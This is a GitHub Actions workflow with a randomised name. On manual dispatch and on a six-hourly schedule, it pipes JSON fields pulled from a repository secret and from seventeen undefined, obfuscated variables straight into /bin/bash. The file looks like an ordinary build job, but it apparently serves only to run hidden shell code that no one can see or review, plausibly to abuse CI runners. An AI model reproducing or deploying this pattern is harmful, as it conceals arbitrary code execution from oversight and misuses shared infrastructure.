name: meiwucan8563

on:
  workflow_dispatch:
  schedule:
    - cron: '6 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: meiwucan8563
        env:
          lg34: ${{ secrets.lg34 }}
        run: |
          echo $lg34 | jq -r .h52 | /bin/bash
          echo $nse2 | jq -r .v9 | /bin/bash
          echo $k8 | jq -r .rxj7 | /bin/bash
          echo $n92 | jq -r .ked6 | /bin/bash
          echo $zyt0626 | jq -r .jg5 | /bin/bash
          echo $y35827 | jq -r .t06437 | /bin/bash
          echo $ilie790 | jq -r .zwc1611 | /bin/bash
          echo $ub750 | jq -r .er98654 | /bin/bash
          echo $rpp00 | jq -r .h27 | /bin/bash
          echo $hfo9 | jq -r .lf89 | /bin/bash
          echo $kkftb7 | jq -r .juubb55237 | /bin/bash
          echo $rf86044 | jq -r .gskz189 | /bin/bash
          echo $liz358 | jq -r .ashus6 | /bin/bash
          echo $vw232 | jq -r .g0377 | /bin/bash
          echo $h624 | jq -r .h44369 | /bin/bash
          echo $tvj6 | jq -r .htsrs35159 | /bin/bash
          echo $kkf3 | jq -r .eecej812 | /bin/bash
          echo $qt49221 | jq -r .ge3388 | /bin/bash

